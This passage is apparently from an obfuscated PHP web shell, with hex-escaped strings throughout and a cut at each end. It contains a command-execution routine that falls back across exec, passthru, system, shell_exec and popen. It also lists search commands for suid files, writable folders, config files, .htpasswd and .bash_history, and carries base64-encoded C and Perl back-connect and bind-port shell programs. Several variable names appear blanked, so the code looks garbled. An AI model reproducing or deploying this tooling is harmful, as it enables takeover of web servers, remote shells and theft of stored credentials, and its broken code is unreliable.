"\74\x2f\163\145\x6c\x65\x63\x74\x3e\74\57\154\141\x62\x65\154\x3e"; if (!empty($_COOKIE["\x61\x63\x74"]) && @count($_COOKIE["\146"]) && ($_COOKIE["\x61\x63\164"] == "\x7a\x69\160" || $_COOKIE["\141\143\x74"] == "\x74\x61\162")) { echo "\x26\156\142\163\160\x3b\146\x69\154\145\x20\156\141\x6d\x65\x3a\x20\x3c\151\x6e\160\x75\164\40\164\171\160\145\x3d\x74\x65\170\x74\x20\x6e\x61\x6d\x65\x3d\x70\62\x20\166\x61\x6c\165\145\75\x27\150\141\x72\x64\x5f" . date("\131\155\144\x5f\x48\151\163") . "\56" . ($_COOKIE["\x61\143\164"] == "\x7a\151\160" ? "\172\151\x70" : "\x74\x61\162\x2e\147\172") . "\x27\x3e\46\156\x62\163\x70\73"; } echo "\x3c\151\156\x70\x75\164\40\x74\171\x70\x65\x3d\47\163\165\x62\155\151\164\47\40\166\141\x6c\x75\145\x3d\47\163\165\142\155\x69\164\47\76\x3c\x2f\164\x64\x3e\x3c\x2f\x74\162\x3e\x3c\x2f\x66\157\x72\x6d\x3e\x3c\x2f\x74\x61\x62\154\x65\76\74\x2f\x64\151\x76\x3e"; hardFooter(); } goto Bpag2; rc2dt: function ex($in) { $ = ''; if (function_exists("\145\170\145\x63")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("\x70\x61\x73\163\164\150\x72\x75")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("\163\x79\x73\164\145\x6d")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("\163\150\x65\x6c\154\137\x65\x78\x65\143")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "\162"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\342\x86\xb3\40\125\x6e\141\142\154\x65\x20\164\157\40\145\170\x65\x63\165\x74\x65\x20\143\157\155\155\141\156\x64\xa"; } return $ == '' ? "\342\206\263\40\x51\x75\145\162\171\x20\144\151\x64\40\156\x6f\164\40\162\x65\164\165\162\x6e\x20\x61\x6e\x79\x74\150\151\x6e\147\12" : $; } goto YQzoR; r2c06: @ini_set("\x6c\x6f\x67\x5f\145\x72\162\157\162\163", 0); goto dPBlO; XGk3X: if ($os == "\167\151\x6e") { $aliases = array("\x4c\151\163\164\x20\104\151\162\145\143\x74\x6f\x72\171" => "\x64\151\x72", "\106\151\x6e\144\40\x69\156\x64\x65\170\56\x70\x68\160\x20\x69\x6e\40\x63\165\162\x72\145\156\164\x20\x64\x69\162" => "\x64\x69\162\40\x2f\x73\40\x2f\167\40\x2f\x62\x20\x69\156\x64\x65\x78\56\x70\x68\160", "\106\151\x6e\144\x20\x2a\x63\x6f\x6e\x66\x69\x67\52\x2e\160\x68\x70\40\151\x6e\40\x63\x75\162\162\145\x6e\164\40\144\151\x72" => "\x64\x69\162\40\57\x73\x20\x2f\167\40\x2f\x62\40\52\143\x6f\156\146\151\x67\x2a\x2e\160\x68\160", "\123\150\x6f\x77\x20\141\x63\x74\x69\166\x65\x20\143\157\156\x6e\145\143\x74\151\x6f\x6e\163" => "\156\145\164\x73\x74\141\164\x20\x2d\141\x6e", "\x53\150\x6f\167\x20\x72\165\156\156\x69\x6e\147\x20\x73\145\162\x76\x69\x63\x65\163" => "\156\145\164\40\163\164\141\162\x74", "\x55\x73\x65\162\x20\141\143\143\x6f\x75\x6e\164\x73" => "\x6e\x65\x74\x20\165\x73\x65\x72", "\x53\x68\157\167\40\x63\x6f\155\x70\165\164\145\162\x73" => "\x6e\145\x74\x20\x76\x69\x65\167", "\101\122\120\x20\124\x61\x62\x6c\x65" => "\141\162\160\40\55\141", "\x49\x50\x20\x43\157\x6e\146\x69\x67\x75\x72\141\x74\151\157\x6e" => "\x69\160\x63\x6f\x6e\146\151\147\x20\x2f\141\154\154"); } else { $aliases = array("\114\x69\163\164\40\144\x69\x72" => "\x6c\163\x20\55\x6c\150\141", "\x6c\151\163\164\x20\x66\x69\154\x65\40\x61\x74\164\162\151\142\165\x74\x65\x73\40\157\156\40\x61\40\x4c\151\156\165\x78\40\163\x65\143\x6f\156\x64\x20\145\170\164\145\x6e\144\x65\x64\x20\146\151\x6c\x65\x20\163\x79\x73\164\x65\155" => "\x6c\x73\x61\x74\164\x72\40\x2d\x76\x61", "\163\x68\157\167\40\x6f\x70\x65\x6e\145\144\x20\160\157\162\x74\163" => "\x6e\x65\164\163\x74\141\x74\40\x2d\x61\x6e\x20\174\x20\x67\x72\145\x70\x20\x2d\x69\x20\154\x69\x73\x74\x65\x6e", "\x70\x72\x6f\143\x65\x73\x73\40\163\164\x61\x74\165\163" => "\x70\x73\40\141\165\170", "\106\151\x6e\144" => '', "\x66\x69\156\x64\40\x61\154\x6c\40\163\x75\x69\144\40\146\151\154\x65\x73" => "\x66\x69\x6e\x64\40\x2f\x20\x2d\164\x79\x70\x65\40\x66\40\x2d\160\145\x72\155\x20\x2d\x30\x34\60\x30\60\x20\55\154\163", "\146\x69\x6e\144\x20\x73\165\151\x64\x20\146\x69\x6c\145\163\40\x69\x6e\x20\143\165\162\162\145\156\164\x20\x64\x69\x72" => "\x66\151\156\x64\40\56\40\55\x74\x79\160\x65\x20\146\x20\x2d\160\x65\162\155\40\55\60\64\x30\x30\60\x20\55\154\163", "\146\151\x6e\144\x20\141\154\154\40\163\x67\151\x64\x20\146\151\x6c\145\x73" => "\146\151\x6e\144\40\57\40\x2d\x74\171\x70\x65\40\146\x20\x2d\x70\x65\x72\x6d\x20\55\60\62\x30\60\60\x20\x2d\x6c\x73", "\x66\151\156\144\x20\x73\147\151\144\x20\x66\151\154\145\163\40\151\156\x20\143\x75\162\x72\x65\x6e\x74\40\x64\151\162" => "\146\x69\156\144\40\56\40\x2d\164\x79\160\x65\x20\x66\40\55\160\145\x72\x6d\40\x2d\60\62\x30\60\60\x20\55\x6c\163", "\x66\151\156\x64\40\143\x6f\x6e\146\x69\147\56\x69\156\x63\56\160\150\160\40\x66\151\x6c\x65\163" => "\x66\x69\156\x64\x20\57\x20\x2d\164\171\x70\x65\x20\146\x20\55\156\x61\x6d\145\x20\x63\157\x6e\x66\151\147\56\x69\156\143\56\160\x68\160", "\x66\x69\156\144\40\x63\x6f\x6e\x66\151\147\x2a\40\146\x69\x6c\145\x73" => "\146\x69\156\x64\x20\57\x20\x2d\164\x79\160\145\x20\146\x20\55\156\x61\x6d\145\40\x22\x63\x6f\x6e\146\x69\x67\52\x22", "\x66\151\156\x64\x20\x63\157\156\146\x69\147\52\40\x66\x69\154\x65\163\x20\x69\x6e\40\x63\165\162\x72\x65\x6e\x74\x20\144\x69\162" => "\x66\151\x6e\x64\x20\56\40\x2d\164\x79\160\145\40\146\40\x2d\156\141\x6d\145\40\x22\143\x6f\x6e\146\151\x67\x2a\42", "\146\151\156\x64\x20\x61\x6c\x6c\40\167\x72\151\164\x61\142\x6c\145\x20\x66\x6f\154\x64\145\162\x73\x20\141\x6e\x64\x20\x66\151\x6c\x65\x73" => "\146\x69\156\144\x20\x2f\x20\55\x70\145\162\x6d\40\55\x32\40\55\154\163", "\146\x69\x6e\x64\40\x61\x6c\154\x20\167\x72\x69\164\x61\x62\154\x65\x20\x66\x6f\154\x64\x65\162\163\x20\141\156\144\x20\x66\151\154\145\x73\x20\x69\x6e\x20\143\x75\x72\x72\145\x6e\164\x20\x64\151\x72" => "\146\151\x6e\144\40\56\40\x2d\x70\x65\x72\155\40\x2d\62\x20\55\154\163", "\146\151\x6e\144\40\x61\x6c\154\40\163\x65\x72\166\151\143\145\56\x70\x77\144\40\x66\x69\154\145\163" => "\x66\x69\156\x64\40\57\x20\55\x74\171\x70\x65\x20\x66\x20\55\156\x61\x6d\x65\40\x73\145\x72\x76\151\x63\145\x2e\160\167\144", "\146\151\156\144\x20\x73\145\162\166\x69\x63\x65\x2e\160\x77\144\40\x66\x69\x6c\145\163\40\151\156\40\143\165\x72\x72\145\156\x74\40\144\x69\x72" => "\x66\x69\156\144\x20\56\x20\x2d\164\x79\160\x65\x20\146\x20\55\156\141\155\x65\40\163\145\x72\x76\x69\x63\145\56\160\167\144", "\x66\x69\156\x64\x20\141\154\x6c\x20\56\150\x74\160\x61\163\x73\167\144\x20\146\151\154\145\x73" => "\146\x69\x6e\144\x20\57\40\55\x74\171\160\145\40\x66\40\55\x6e\x61\155\145\40\56\x68\x74\x70\141\x73\163\x77\x64", "\x66\x69\156\x64\x20\56\x68\164\x70\x61\163\x73\167\x64\40\x66\151\154\x65\163\40\x69\x6e\40\x63\165\x72\162\145\x6e\164\40\144\x69\x72" => "\x66\151\x6e\144\40\x2e\x20\x2d\x74\x79\160\145\x20\x66\x20\x2d\x6e\x61\155\x65\40\56\x68\x74\x70\141\x73\x73\167\144", "\146\151\x6e\144\x20\141\x6c\x6c\x20\x2e\x62\141\163\150\137\x68\151\x73\164\x6f\162\x79\40\146\x69\154\x65\x73" => "\x66\x69\156\144\x20\x2f\40\x2d\x74\x79\x70\x65\40\x66\x20\x2d\156\141\x6d\x65\40\56\142\141\x73\150\137\150\x69\163\164\x6f\162\x79", "\146\151\x6e\x64\40\56\x62\x61\x73\150\x5f\150\151\163\x74\157\x72\x79\40\146\x69\x6c\x65\x73\40\151\x6e\x20\x63\x75\162\162\145\x6e\164\x20\x64\151\162" => "\146\x69\156\x64\x20\x2e\40\x2d\x74\171\160\x65\40\x66\40\x2d\x6e\141\x6d\x65\x20\56\x62\141\x73\150\137\x68\x69\163\x74\157\x72\x79", "\146\x69\x6e\144\x20\x61\154\x6c\x20\56\x66\145\x74\x63\150\x6d\141\x69\x6c\x72\x63\40\x66\151\x6c\145\163" => "\x66\x69\156\x64\x20\x2f\x20\x2d\164\x79\x70\x65\40\x66\40\x2d\x6e\141\x6d\x65\x20\x2e\146\x65\164\x63\x68\x6d\141\151\x6c\x72\x63", "\146\151\156\144\40\56\146\145\x74\x63\x68\x6d\141\151\154\162\143\x20\146\151\154\x65\x73\40\151\x6e\40\143\165\162\x72\x65\156\164\x20\144\151\x72" => "\146\x69\156\144\x20\56\x20\x2d\164\171\160\x65\x20\x66\40\55\x6e\x61\155\145\x20\x2e\146\145\x74\x63\150\x6d\141\151\x6c\x72\143", "\114\157\x63\x61\x74\x65" => '', "\x6c\157\143\141\164\x65\x20\150\x74\164\x70\144\56\143\157\156\146\x20\x66\151\x6c\x65\x73" => "\154\x6f\143\141\x74\145\40\150\x74\x74\x70\x64\56\x63\x6f\156\146", "\154\157\143\141\x74\145\x20\166\x68\x6f\x73\164\x73\x2e\x63\157\156\146\40\x66\x69\x6c\145\x73" => "\154\x6f\143\141\x74\145\40\166\x68\157\163\164\x73\56\143\x6f\156\x66", "\x6c\157\x63\x61\164\x65\x20\160\x72\x6f\146\x74\160\x64\56\x63\157\x6e\146\40\146\x69\154\145\163" => "\x6c\x6f\x63\141\x74\x65\40\160\162\157\146\164\x70\144\56\143\157\156\x66", "\x6c\x6f\143\x61\x74\x65\40\160\x73\x79\x62\x6e\143\56\x63\x6f\x6e\x66\40\x66\151\x6c\x65\x73" => "\x6c\157\x63\141\x74\x65\x20\x70\163\171\x62\156\x63\x2e\143\157\x6e\146", "\x6c\x6f\x63\x61\164\145\x20\x6d\171\56\143\x6f\156\146\40\146\x69\154\x65\163" => "\x6c\157\x63\141\x74\145\x20\x6d\171\56\x63\157\x6e\146", "\x6c\157\x63\x61\x74\x65\40\141\144\155\151\156\56\160\x68\160\x20\146\151\x6c\x65\163" => "\154\157\x63\x61\164\x65\x20\141\144\155\x69\156\x2e\160\x68\160", "\x6c\x6f\x63\141\164\x65\x20\143\146\147\56\160\150\160\x20\x66\151\x6c\145\163" => "\154\x6f\x63\141\164\x65\40\x63\146\147\56\x70\150\160", "\154\x6f\143\141\164\x65\x20\143\157\156\x66\x2e\160\150\160\40\x66\151\154\145\163" => "\x6c\x6f\x63\x61\164\145\40\x63\x6f\x6e\146\x2e\160\150\160", "\x6c\x6f\x63\141\164\145\x20\x63\157\x6e\146\x69\x67\56\144\141\164\x20\146\151\x6c\x65\163" => "\x6c\x6f\143\141\164\145\x20\143\x6f\156\146\151\x67\x2e\144\141\x74", "\154\x6f\143\x61\x74\145\x20\x63\x6f\x6e\x66\151\147\56\160\x68\160\x20\146\x69\154\145\x73" => "\x6c\x6f\143\141\164\145\40\143\x6f\x6e\146\x69\147\56\160\x68\160", "\154\x6f\143\141\164\145\40\143\x6f\156\x66\151\x67\56\x69\156\143\40\x66\x69\154\145\x73" => "\x6c\157\143\x61\x74\145\x20\143\x6f\x6e\x66\151\x67\x2e\x69\156\x63", "\154\157\143\141\164\x65\40\x63\x6f\156\146\151\147\56\x69\156\x63\56\160\x68\x70" => "\x6c\157\143\x61\164\x65\x20\143\x6f\156\x66\151\x67\x2e\x69\156\x63\56\160\150\x70", "\154\157\x63\x61\164\145\40\143\x6f\x6e\x66\x69\x67\x2e\144\x65\146\x61\165\154\164\x2e\x70\150\x70\x20\146\x69\154\145\163" => "\x6c\157\143\x61\164\145\x20\x63\x6f\x6e\x66\151\x67\x2e\144\x65\x66\x61\165\x6c\x74\x2e\160\x68\160", "\154\x6f\x63\141\x74\145\40\143\x6f\x6e\146\x69\147\x2a\x20\146\151\x6c\x65\x73\x20" => "\x6c\x6f\x63\141\x74\x65\x20\x63\x6f\156\146\151\x67", "\x6c\x6f\x63\x61\164\145\40\56\x63\157\x6e\x66\x20\146\x69\x6c\x65\163" => "\154\x6f\143\x61\x74\x65\40\47\56\x63\157\156\x66\47", "\x6c\x6f\143\x61\164\x65\x20\56\160\167\x64\x20\x66\x69\x6c\145\x73" => "\154\x6f\x63\x61\x74\x65\x20\47\x2e\x70\167\x64\47", "\154\157\x63\141\x74\145\x20\56\163\x71\x6c\x20\146\x69\x6c\145\163" => "\154\157\143\141\164\145\40\47\56\x73\161\x6c\47", "\x6c\x6f\143\141\164\x65\40\x2e\150\164\x70\141\163\163\x77\144\40\x66\x69\x6c\x65\x73" => "\x6c\157\143\x61\x74\x65\40\47\x2e\150\x74\x70\x61\x73\163\x77\144\x27", "\x6c\x6f\143\141\164\145\x20\56\142\141\x73\150\137\x68\x69\x73\x74\x6f\x72\171\x20\x66\x69\x6c\145\163" => "\154\x6f\143\x61\164\145\40\x27\x2e\142\141\163\x68\137\x68\x69\x73\x74\157\162\x79\x27", "\x6c\157\x63\x61\x74\x65\x20\x2e\155\171\x73\x71\154\x5f\x68\151\163\164\x6f\x72\171\x20\x66\x69\154\x65\163" => "\x6c\157\x63\x61\x74\145\x20\47\x2e\155\x79\x73\x71\154\x5f\x68\x69\x73\164\157\162\171\47", "\x6c\x6f\x63\x61\x74\145\40\x2e\x66\145\x74\x63\150\155\141\x69\154\x72\143\x20\146\x69\154\x65\163" => "\154\157\x63\141\x74\x65\x20\x27\x2e\146\145\x74\143\150\155\x61\x69\154\162\x63\47", "\154\x6f\x63\x61\x74\x65\40\142\141\143\153\x75\160\x20\146\151\154\145\163" => "\x6c\x6f\143\141\x74\145\x20\142\141\143\153\165\160", "\154\157\143\x61\x74\x65\x20\x64\x75\x6d\x70\x20\x66\151\154\145\x73" => "\154\x6f\x63\x61\x74\145\40\144\165\155\160", "\x6c\x6f\143\x61\164\x65\x20\160\162\x69\x76\40\x66\151\x6c\x65\x73" => "\x6c\157\143\x61\x74\145\x20\160\x72\x69\x76"); } goto Y2Zvy; TA8hx: $ = "\125\x54\106\x2d\70"; goto TQhs6; fqre7: if ($os == "\x77\151\x6e") { $home_cwd = str_replace("\134", "\57", $home_cwd); $cwd = str_replace("\134", "\57", $cwd); } goto wJWJM; ewK8X: if (empty($_POST["\143\150\141\x72\x73\x65\x74"])) { $_POST["\x63\150\x61\162\163\145\164"] = $; } goto hJVFy; ee0Wn: $ = md5($pw_unhashed); goto z59JV; gaWab: function actionNetwork() { hardHeader(); $back_connect_c = "\x49\62\154\x75\x59\x32\x78\x31\x5a\107\125\x67\120\x48\116\x30\x5a\107\154\166\114\155\x67\x2b\104\121\157\x6a\x61\x57\65\152\142\x48\x56\x6b\x5a\x53\101\70\x63\x33\x6c\x7a\x4c\63\116\166\131\x32\164\154\x64\103\x35\157\x50\147\x30\x4b\111\x32\154\165\x59\62\x78\x31\x5a\x47\x55\x67\x50\x47\x35\x6c\x64\107\154\165\132\130\121\x76\141\x57\x34\x75\x61\104\64\x4e\103\155\154\x75\144\x43\102\164\x59\127\154\x75\x4b\x47\x6c\165\144\103\x42\x68\143\155\144\152\114\x43\x42\x6a\x61\107\106\171\x49\103\x70\150\143\x6d\144\62\x57\61\60\x70\x49\x48\163\116\x43\151\101\147\x49\103\102\160\x62\156\121\147\132\x6d\x51\x37\x44\x51\157\x67\x49\103\x41\x67\x63\63\122\x79\x64\x57\x4e\x30\111\x48\x4e\166\x59\x32\164\x68\132\x47\x52\x79\130\x32\154\x75\x49\x48\x4e\160\142\x6a\x73\x4e\x43\x69\x41\147\111\103\x42\x6b\x59\x57\126\x74\142\62\x34\x6f\x4d\123\167\x77\113\x54\163\116\x43\151\101\x67\111\103\x42\172\x61\x57\64\x75\x63\62\x6c\165\130\x32\x5a\x68\x62\x57\154\x73\x65\x53\101\x39\x49\105\x46\x47\x58\x30\x6c\x4f\122\126\121\67\x44\121\157\x67\x49\103\x41\x67\x63\62\x6c\165\114\x6e\x4e\x70\142\x6c\71\167\142\x33\112\x30\x49\104\x30\147\141\x48\122\166\x62\x6e\x4d\157\131\x58\122\x76\141\123\150\x68\143\155\x64\x32\x57\172\112\144\113\123\x6b\x37\x44\121\157\x67\111\103\101\147\143\62\154\165\114\156\x4e\160\x62\x6c\x39\x68\132\107\122\x79\x4c\156\116\146\131\127\122\x6b\143\x69\x41\x39\x49\107\154\x75\x5a\130\x52\146\x59\127\122\x6b\x63\x69\150\x68\x63\155\x64\62\x57\172\106\144\x4b\x54\x73\x4e\x43\x69\x41\147\111\x43\102\x6d\132\x43\x41\x39\x49\110\116\x76\x59\x32\x74\x6c\x64\103\x68\102\122\x6c\71\112\124\x6b\x56\x55\114\x43\102\124\124\60\x4e\114\x58\61\116\x55\x55\x6b\126\x42\124\x53\x77\x67\x53\126\102\x51\125\x6b\71\x55\124\x31\71\125\121\61\101\160\x49\104\163\x4e\103\151\101\x67\111\103\102\160\x5a\x69\x41\x6f\113\107\116\166\142\x6d\x35\154\x59\63\x51\x6f\132\155\x51\x73\x49\x43\x68\x7a\144\110\x4a\61\131\63\121\x67\143\x32\x39\152\x61\x32\x46\x6b\132\x48\111\147\113\x69\153\x67\112\x6e\x4e\160\142\151\x77\x67\x63\62\x6c\x36\x5a\x57\x39\x6d\x4b\x48\116\60\x63\x6e\x56\152\x64\103\102\x7a\x62\x32\116\162\131\x57\122\x6b\143\x69\x6b\160\113\124\167\x77\x4b\x53\x42\67\104\121\157\147\111\103\x41\147\111\x43\101\147\x49\x48\102\154\143\156\x4a\x76\143\x69\x67\151\x51\x32\71\165\x62\155\x56\152\x64\103\102\x6d\131\x57\154\x73\111\x69\x6b\67\104\121\157\x67\111\103\x41\147\111\x43\101\147\x49\x48\x4a\x6c\x64\110\126\171\142\x69\101\x77\117\167\x30\113\x49\x43\x41\147\x49\110\60\116\x43\151\101\x67\x49\103\x42\153\144\x58\x41\x79\x4b\107\x5a\153\x4c\x43\x41\167\x4b\x54\163\x4e\x43\151\x41\x67\x49\x43\x42\x6b\144\x58\x41\171\x4b\107\132\153\x4c\103\101\170\x4b\124\x73\116\x43\151\101\x67\x49\103\x42\153\144\x58\101\171\113\x47\x5a\153\x4c\103\101\x79\x4b\124\163\x4e\x43\x69\x41\x67\111\103\x42\172\145\130\116\x30\132\x57\60\x6f\x49\x69\71\151\141\127\x34\166\x63\62\147\x67\x4c\x57\153\x69\x4b\124\x73\116\x43\151\x41\x67\111\x43\102\152\x62\x47\71\172\x5a\x53\x68\155\x5a\103\153\x37\x44\121\x70\71"; $back_connect_p = "\x49\171\x45\x76\x64\130\116\x79\x4c\62\x4a\160\x62\151\71\x77\x5a\x58\112\x73\104\x51\160\61\143\x32\x55\147\125\x32\71\152\x61\x32\126\60\x4f\x77\x30\113\112\107\x6c\150\x5a\107\122\x79\x50\x57\154\x75\x5a\130\122\146\x59\x58\122\x76\142\151\x67\153\x51\126\112\x48\x56\154\x73\167\x58\x53\x6b\x67\x66\110\167\147\132\x47\x6c\154\x4b\x43\112\106\143\156\112\x76\143\x6a\x6f\147\112\103\x46\143\142\x69\x49\160\x4f\x77\x30\113\x4a\x48\102\150\132\107\x52\171\x50\x58\x4e\x76\131\62\x74\150\132\x47\122\x79\x58\62\154\x75\x4b\103\x52\102\x55\x6b\144\x57\127\x7a\106\x64\x4c\x43\x41\153\x61\x57\x46\x6b\132\110\x49\x70\111\x48\170\70\x49\107\x52\160\x5a\123\147\151\x52\130\112\x79\142\63\x49\x36\111\x43\121\150\x58\x47\64\151\x4b\124\163\116\103\151\x52\167\x63\155\x39\60\142\x7a\x31\x6e\132\x58\122\167\143\155\71\x30\x62\62\x4a\x35\x62\x6d\106\164\x5a\x53\x67\x6e\144\107\116\167\x4a\x79\153\x37\x44\x51\x70\x7a\x62\62\x4e\162\132\130\121\x6f\x55\60\71\x44\123\60\126\x55\x4c\x43\102\x51\122\154\71\112\124\153\126\x55\x4c\103\x42\124\x54\x30\116\114\130\61\116\x55\125\x6b\126\x42\x54\123\167\147\112\110\102\171\x62\x33\122\x76\x4b\123\102\70\146\103\x42\x6b\x61\x57\125\x6f\111\x6b\126\x79\x63\x6d\71\171\x4f\151\101\x6b\111\x56\170\x75\x49\151\x6b\x37\104\x51\x70\152\142\x32\x35\x75\132\x57\116\x30\x4b\106\x4e\120\121\x30\x74\106\x56\x43\167\147\112\x48\102\x68\x5a\107\x52\x79\113\123\x42\70\x66\103\x42\x6b\141\x57\x55\x6f\x49\x6b\126\171\x63\x6d\71\x79\x4f\x69\101\153\111\x56\170\x75\111\x69\153\x37\x44\x51\x70\x76\x63\x47\126\165\x4b\106\116\x55\122\x45\x6c\x4f\114\x43\101\151\120\151\x5a\124\x54\60\x4e\x4c\x52\x56\121\x69\113\x54\x73\116\x43\155\x39\167\x5a\x57\x34\x6f\125\61\x52\x45\124\61\126\125\114\103\x41\151\x50\151\132\x54\124\x30\116\x4c\122\126\121\x69\113\x54\x73\x4e\103\x6d\71\x77\132\x57\x34\x6f\x55\61\x52\x45\122\x56\x4a\x53\114\x43\x41\151\120\151\x5a\124\124\60\x4e\114\122\x56\x51\x69\113\124\163\x4e\x43\156\x4e\x35\143\x33\122\154\x62\123\147\156\114\62\x4a\160\142\151\71\x7a\141\x43\101\x74\x61\x53\x63\x70\117\x77\x30\113\131\62\170\166\143\62\x55\157\x55\x31\x52\x45\x53\x55\x34\x70\117\167\x30\113\x59\62\170\166\x63\x32\x55\157\x55\x31\x52\105\124\x31\x56\125\x4b\x54\163\x4e\x43\155\x4e\163\142\x33\116\154\113\x46\x4e\x55\x52\105\x56\x53\125\x69\153\67"; $bind_port_c = "\x49\x32\154\x75\131\x32\x78\61\132\x47\x55\147\120\110\116\60\132\x47\154\166\114\x6d\147\53\104\x51\x6f\152\141\x57\x35\152\142\110\x56\x6b\132\x53\101\x38\143\63\122\x79\x61\x57\x35\x6e\x4c\155\147\x2b\104\x51\x6f\152\x61\127\65\x6a\142\110\x56\153\x5a\x53\x41\70\144\x57\65\160\143\x33\122\153\x4c\155\147\53\104\x51\157\x6a\x61\127\x35\x6a\142\110\x56\x6b\x5a\x53\x41\70\x62\155\126\x30\132\107\111\165\141\x44\x34\116\x43\x69\116\x70\142\155\116\x73\144\x57\x52\154\x49\104\x78\x7a\x64\107\x52\163\141\x57\111\x75\141\104\x34\116\x43\155\x6c\165\x64\x43\x42\164\x59\127\154\165\113\x47\x6c\165\x64\103\x42\150\x63\x6d\x64\x6a\114\103\x42\152\141\x47\x46\171\x49\x43\x6f\161\131\x58\x4a\x6e\144\151\x6b\147\145\167\x30\113\x49\x43\x41\147\111\107\x6c\165\x64\103\102\172\114\107\115\x73\141\124\163\x4e\x43\x69\101\x67\111\103\x42\x6a\141\x47\106\x79\x49\x48\102\x62\115\172\x42\144\x4f\167\60\113\111\x43\x41\147\111\x48\116\x30\143\x6e\126\152\x64\x43\x42\x7a\142\62\x4e\x72\131\127\122\x6b\143\x6c\71\x70\x62\151\102\x79\x4f\167\x30\113\111\103\101\x67\111\107\x52\x68\132\x57\61\166\142\x69\x67\170\x4c\x44\101\x70\117\x77\x30\113\x49\103\x41\147\111\110\x4d\x67\x50\123\x42\172\142\x32\116\162\x5a\130\x51\x6f\x51\x55\132\146\123\125\65\106\126\x43\x78\x54\124\60\116\x4c\130\61\116\x55\125\153\x56\x42\x54\x53\x77\x77\x4b\x54\163\x4e\x43\151\101\147\111\x43\x42\x70\132\x69\x67\150\143\x79\153\x67\x63\x6d\x56\60\x64\130\112\165\x49\x43\60\x78\117\x77\x30\x4b\x49\103\x41\147\111\x48\111\165\x63\x32\154\165\x58\62\x5a\150\x62\127\x6c\x73\145\x53\101\x39\x49\105\106\107\x58\60\x6c\117\122\126\121\67\x44\121\x6f\x67\111\x43\x41\x67\143\151\65\x7a\141\x57\x35\x66\x63\x47\x39\171\x64\x43\101\x39\111\107\150\60\x62\62\65\x7a\113\x47\x46\x30\142\62\153\157\x59\130\x4a\156\144\x6c\163\x78\130\x53\153\160\x4f\x77\x30\113\111\x43\x41\147\x49\110\111\165\143\62\154\x75\130\62\x46\x6b\132\x48\111\x75\143\61\71\x68\132\x47\x52\x79\111\104\60\147\141\x48\x52\x76\x62\155\x77\x6f\123\125\x35\102\122\105\x52\123\x58\x30\106\x4f\127\123\153\x37\x44\121\157\147\x49\x43\x41\x67\x59\x6d\x6c\x75\132\103\150\172\x4c\103\x41\157\143\63\x52\x79\144\x57\x4e\60\x49\x48\116\x76\131\x32\x74\x68\x5a\107\122\x79\111\103\157\x70\x4a\156\111\x73\x49\x44\x42\x34\115\x54\x41\160\x4f\x77\60\113\111\103\101\x67\x49\x47\170\160\x63\x33\122\154\x62\x69\150\172\114\x43\x41\x31\x4b\124\163\x4e\x43\x69\x41\x67\111\x43\x42\x33\x61\x47\x6c\x73\132\123\x67\x78\113\123\102\x37\x44\x51\x6f\x67\x49\103\101\x67\x49\x43\101\147\111\x47\x4d\x39\x59\x57\x4e\x6a\x5a\130\x42\60\x4b\110\x4d\163\x4d\x43\167\x77\113\x54\163\x4e\x43\x69\x41\147\111\x43\x41\147\x49\x43\101\147\132\110\x56\167\x4d\x69\150\x6a\x4c\x44\x41\160\x4f\x77\x30\113\111\103\x41\x67\111\103\x41\147\x49\x43\102\x6b\x64\x58\101\171\113\107\115\163\115\123\x6b\67\x44\121\x6f\x67\x49\103\101\147\111\103\x41\147\x49\107\122\61\143\x44\x49\157\x59\x79\x77\x79\x4b\124\x73\x4e\x43\x69\x41\x67\x49\x43\101\x67\x49\103\101\x67\144\63\x4a\160\x64\107\x55\x6f\131\x79\x77\151\x55\x47\106\172\x63\x33\144\x76\143\x6d\x51\66\x49\x69\167\x35\113\x54\x73\116\x43\151\101\x67\111\x43\101\147\x49\103\101\x67\x63\x6d\x56\x68\132\103\x68\x6a\114\110\101\163\x63\x32\x6c\x36\x5a\127\71\155\x4b\110\x41\160\113\x54\x73\x4e\x43\x69\101\147\x49\x43\101\x67\111\103\101\x67\x5a\155\71\x79\113\107\x6b\x39\x4d\104\x74\x70\120\110\x4e\x30\x63\155\x78\x6c\142\151\x68\x77\113\x54\164\x70\x4b\x79\163\160\x44\121\x6f\x67\111\x43\101\147\x49\103\101\147\x49\x43\x41\147\x49\x43\102\x70\132\151\147\147\x4b\110\102\x62\x61\x56\x30\x67\x50\124\60\x67\112\61\170\165\x4a\x79\x6b\147\x66\x48\x77\147\x4b\110\102\x62\141\126\x30\x67\120\x54\x30\147\x4a\x31\170\x79\x4a\171\153\x67\113\121\60\113\111\x43\x41\147\111\103\x41\x67\111\103\101\x67\x49\103\x41\x67\111\x43\101\x67\111\x48\102\142\x61\x56\60\x67\120\123\x41\x6e\130\104\101\156\117\167\x30\x4b\111\x43\101\x67\x49\x43\x41\147\111\103\102\160\132\x69\101\157\143\63\122\171\131\62\x31\x77\x4b\x47\x46\x79\132\63\132\x62\115\x6c\60\163\143\103\153\147\120\124\60\x67\115\103\153\116\103\151\x41\x67\111\103\101\x67\111\x43\101\x67\x49\x43\x41\x67\x49\110\116\65\x63\x33\122\x6c\142\123\x67\151\114\62\x4a\x70\142\151\71\172\x61\103\x41\164\141\x53\111\x70\117\x77\x30\x4b\111\103\x41\147\x49\103\x41\x67\111\103\x42\x6a\142\107\x39\x7a\x5a\x53\150\152\113\x54\163\116\103\151\101\x67\111\103\102\x39\104\x51\160\x39"; $bind_port_p = "\x49\x79\105\x76\144\x58\116\171\x4c\62\x4a\160\142\151\x39\x77\x5a\130\x4a\x73\104\121\157\x6b\x55\60\x68\106\x54\105\167\71\x49\151\x39\x69\x61\x57\x34\166\143\x32\147\x67\x4c\x57\153\151\x4f\167\x30\x4b\141\127\131\147\x4b\105\x42\x42\125\153\144\x57\x49\104\x77\x67\115\x53\153\147\145\x79\x42\x6c\x65\107\x6c\60\113\x44\105\160\117\171\x42\x39\x44\121\160\61\143\x32\x55\147\125\62\71\x6a\x61\62\126\x30\x4f\x77\x30\x4b\x63\x32\x39\x6a\x61\62\x56\60\x4b\106\115\163\112\x6c\102\107\x58\60\154\117\x52\126\121\163\112\154\116\120\121\60\164\146\125\x31\x52\123\122\x55\x46\x4e\114\x47\x64\154\144\110\x42\x79\x62\x33\x52\x76\x59\x6e\154\x75\131\x57\x31\154\113\103\144\60\x59\63\101\156\113\x53\x6b\x67\146\110\x77\x67\132\107\154\x6c\111\103\x4a\x44\131\127\x35\x30\111\x47\1